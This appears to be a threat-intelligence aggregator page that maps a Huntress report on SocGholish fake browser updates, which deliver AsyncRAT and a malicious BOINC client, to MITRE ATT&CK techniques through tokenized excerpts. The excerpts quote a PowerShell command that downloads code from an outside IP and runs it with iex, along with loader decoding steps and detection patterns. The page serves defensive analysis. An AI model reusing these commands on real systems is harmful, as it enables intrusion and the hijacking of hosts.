TTPwire Vol. 1 · MITRE ATT&CK·Tagged

← All stories

Huntress

Fake Browser Updates Lead to BOINC Volunteer Computing Software | Huntress

2024-07-17 · Read original ↗

ATT&CK techniques detected

22 predictions
T1059.001PowerShell
100%
“powershell. exe " - c curl - useb 216. 245. 184. 105 / 1. php? s = boicn | iex discovery command : " c : \ windows \ system32 \ net. exe " localgroup administrators command and control : " c : \ \ windows \ \ system32 \ \ conhost. exe " - - headless powershell. ( - join ( 0.. 16 …”
T1053.005Scheduled Task
100%
“commands or software on the host to further escalate privileges or move laterally through a network and compromise an entire domain. persistence scheduled tasks were created at several points in the infection. as a result of the asyncrat, scheduled tasks were created to maintain …”
T1053.005Scheduled Task
100%
“number of methods that could be used to detect this behavior in this attack : - process creation using boinc. exe ( original file name ) with a process name other than boinc. exe - windows powershell event log id 4104 ( with scriptblock logging enabled ) that contains the string …”
T1053.005Scheduled Task
99%
“exactly what occurred on the host by examining the script. it creates a list of directory names and randomly chooses one of them to use on the host ( using get - random powershell cmdlet, which utilizes numbers from 0 to [ int32 ] : : maxvalue ). then it sets the full path and cr…”
T1053.005Scheduled Task
99%
““ $ tasknm ” - settings $ settings ; schtasks. exe / r / tn “ $ taskm ” windows security event id 4698 monitors scheduled task creation. monitor these events for any suspicious new tasks in your environment that may execute software from suspicious new locations, such as subdirec…”
T1059.001PowerShell
98%
“for downloading the later stages of the killchain. in this particular case, two disjointed chains occur, with one resulting in a fileless variant of asyncrat and the other ending in a malicious boinc ( berkeley open infrastructure network computing client ) installation. the seco…”
T1053.005Scheduled Task
95%
“as created by the script, is run on the host. " c : \ windows \ system32 \ schtasks. exe " / run / tn system _ health _ service _ 790926033 it creates a registry value. this is a unique misspelling of the word “ experience ” that ’ s been used in the past in conjunction with the …”
T1204.002Malicious File
93%
“fake browser updates lead to boinc volunteer computing software | huntress beginning on july 4, 2024, huntress observed new behaviors in conjunction with malware typically called socgholish or fakeupdates. this is a large malware group, with a number of new campaigns and similar …”
T1053.005Scheduled Task
92%
“and similarly named c2 domain names created by dga. behaviors overlapping with socgholish / fakeupdates - initial access method ( update. js fake browser update ) - top - level domain (. top ) - powershell webrequest to download. svg file - installing asyncrat ( via the. svg file…”
T1021.002SMB/Windows Admin Shares
91%
“##wall add allowedprogram c : \ program files \ sentinelone \ sentinel agent 23. 2. 3. 358 \ sentineldotnetfx. dll systemupdate enable " c : \ windows \ system32 \ conhost. exe " - - headless powershell - ep bypass azureget - smbsession " c : \ windows \ system32 \ conhost. exe "…”
T1059.001PowerShell
90%
“of the powershell loader. this technique is used several times throughout the various powershell stages with different xor keys. - decode the base64 string - xor the bytes with the key " bj3rtga4myi5 " - decompress the contents using gzip - run the result using iex the following …”
T1053.005Scheduled Task
90%
“nicenic international group co., limited ” and a registrant country of south africa. this is a very similar network infrastructure to that noted by at & t alien labs in january 2024 used by an adversary to install asyncrat. using validin, we can clearly see the changes in the cur…”
T1053.005Scheduled Task
86%
“task : " command _ with _ args " : " c : \ \ users \ \ < redacted > \ \ appdata \ \ roaming \ \ eula updater \ \ securityhealthservice. exe - - detach _ console ", " name " : " cleanupmgrtask _ 1322139014 ", " task _ file " : " c : \ \ windows \ \ system32 \ \ tasks \ \ cleanupmg…”
T1053.005Scheduled Task
86%
“same file paths, server domains, and even file names for the boinc client that was used. a recent otx pulse created on july 12, 2024 also shows many of the same domains, ip addresses, files, and ttps observed by huntress. - malicious software is installed as a service - copies of…”
T1059.001PowerShell
79%
“nicenic international group co., limited ” and a registrant country of south africa. this is a very similar network infrastructure to that noted by at & t alien labs in january 2024 used by an adversary to install asyncrat. using validin, we can clearly see the changes in the cur…”
T1059.001PowerShell
70%
“and similarly named c2 domain names created by dga. behaviors overlapping with socgholish / fakeupdates - initial access method ( update. js fake browser update ) - top - level domain (. top ) - powershell webrequest to download. svg file - installing asyncrat ( via the. svg file…”
T1053.005Scheduled Task
68%
“- 9 ] { 1, 10 } system _ health _ service _ [ 0 - 9 ] { 1, 10 } cleanupmgrtask _ [ 0 - 9 ] {, 110 } _ [ 0 - 9 ] { 8, 10 } associated malware families there ’ s a growing number of campaigns and malware with overlapping techniques, especially using fake browser updates as the init…”
T1059.001PowerShell
66%
“3 : suspicious process name the powershell script used to download boinc to the host also renamed the executable file from a list of names and a command to randomly choose a name from the list. this process included an option to not use a name at all, and we observed the boinc so…”
T1053.005Scheduled Task
65%
“we observed showed no tasks had been executed on the hosts, meaning that no functionality of the boinc communication protocols, such as tasks or computing, appeared to have ever been issued. both domains used for these servers were recently created : the files seen communicating …”
T1204.002Malicious File
62%
“- 9 ] { 1, 10 } system _ health _ service _ [ 0 - 9 ] { 1, 10 } cleanupmgrtask _ [ 0 - 9 ] {, 110 } _ [ 0 - 9 ] { 8, 10 } associated malware families there ’ s a growing number of campaigns and malware with overlapping techniques, especially using fake browser updates as the init…”
T1204.002Malicious File
46%
“##gholish and asyncrat together provides excellent opportunities to detect and track behaviors of these families ( or similar malware ). this makes it much easier to identify new tactics being used. when one behavior changes, the other likely hasn ’ t changed. so you can explore …”
T1547.001Registry Run Keys / Startup Folder
36%
“as created by the script, is run on the host. " c : \ windows \ system32 \ schtasks. exe " / run / tn system _ health _ service _ 790926033 it creates a registry value. this is a unique misspelling of the word “ experience ” that ’ s been used in the past in conjunction with the …”

Summary

Huntress has observed new behaviors in conjunction with the malware SocGholish. Read on to understand the implications of this threat and how you can better protect yourself.